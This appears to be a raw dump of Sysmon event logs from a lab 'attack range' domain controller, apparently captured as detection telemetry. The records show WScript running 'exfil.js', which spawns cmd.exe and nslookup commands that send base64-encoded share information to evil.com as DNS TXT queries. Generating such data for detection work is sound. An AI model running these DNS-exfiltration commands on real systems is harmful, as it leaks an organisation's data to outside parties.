14:16:20.211{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197288Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.211{2E1864BB-17A1-629A-783D-000000005F02}55526616C:\Windows\System32\WScript.exe{2E1864BB-17B4-629A-243F-000000005F02}7200C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197287Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.218{2E1864BB-17B4-629A-243F-000000005F02}7200C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrpckz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197286Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.211{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwvu.tmpMD5=74AA98EC4B1C82029578D90E2343E510,SHA256=BCED258190799681E04DEC80A23A2247E8F332523DBBC8B2CBECAB9A40B2F90E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197285Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.174{2E1864BB-17B4-629A-223F-000000005F02}17727760C:\Windows\system32\conhost.exe{2E1864BB-17B4-629A-233F-000000005F02}4052C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197284Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.158{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197283Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.158{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197282Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.158{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197281Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.158{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197280Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.158{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-233F-000000005F02}4052C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197279Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.158{2E1864BB-17B4-629A-213F-000000005F02}79762328C:\Windows\system32\cmd.exe{2E1864BB-17B4-629A-233F-000000005F02}4052C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197278Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.171{2E1864BB-17B4-629A-233F-000000005F02}4052C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B4-629A-213F-000000005F02}7976C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwvu.tmp 2>&1 10341000x8000000000000000197277Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.144{2E1864BB-17B3-629A-193F-000000005F02}66804540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197276Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.127{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B4-629A-223F-000000005F02}1772C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197275Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.127{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B4-629A-223F-000000005F02}1772C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197274Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.127{2E1864BB-17B4-629A-223F-000000005F02}17727760C:\Windows\system32\conhost.exe{2E1864BB-17B4-629A-213F-000000005F02}7976C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197273Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.111{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-223F-000000005F02}1772C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197272Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.111{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197271Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.111{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-213F-000000005F02}7976C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197270Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.111{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197269Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.111{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197268Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.111{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197267Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.108{2E1864BB-17A1-629A-783D-000000005F02}55522812C:\Windows\System32\WScript.exe{2E1864BB-17B4-629A-213F-000000005F02}7976C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000197266Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.110{2E1864BB-17B4-629A-213F-000000005F02}7976C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwvu.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000197265Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.092{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlkjm.tmpMD5=C7EBA965EA2938C9D738B256A5573F35,SHA256=722A438985A6A7CB05BECB0E5BC6B8755AA777F6146D0E8D8A702198A5DDD2AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000197264Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.061{2E1864BB-17B3-629A-1F3F-000000005F02}76527952C:\Windows\system32\conhost.exe{2E1864BB-17B4-629A-203F-000000005F02}6196C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197263Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.061{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197262Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.061{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197261Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.061{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197260Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.061{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000197259Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:20.061{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B4-629A-203F-000000005F02}6196C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000197258Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 